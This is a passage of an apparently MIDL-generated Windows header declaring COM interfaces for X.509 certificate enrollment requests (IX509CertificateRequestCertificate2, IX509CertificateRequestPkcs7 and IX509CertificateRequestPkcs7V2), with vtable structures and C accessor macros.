    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate2_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate2_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCertificate2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab344-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromInnerRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_RequesterName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_RequesterName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7Vtbl;

    interface IX509CertificateRequestPkcs7
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35c-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7V2 : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
